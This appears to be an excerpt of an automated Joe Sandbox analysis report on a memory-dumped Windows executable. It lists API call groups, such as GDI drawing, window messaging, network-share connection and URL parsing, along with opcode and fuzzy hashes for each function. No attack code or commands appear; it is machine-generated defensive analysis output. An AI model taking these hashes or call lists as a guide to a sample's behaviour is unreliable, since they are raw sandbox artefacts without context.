• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9

APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
• Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
• Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                    • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                    • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                    • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                    • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                    • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                    • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2783949968-0
                                                                                                                                                    • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                    • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                    • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                    • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                    APIs
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                                    APIs
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
• Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
• Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
• Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
• Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
• Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
• Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
• Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
• Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
• Opcode ID: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
• Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
• Opcode Fuzzy Hash: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
• Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
• Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
• Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memcmp
• String ID: &
• API String ID: 2931989736-1010288
• Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
• Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
• Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
• API String ID: 1921645428-436463671
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 0045134A
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
APIs
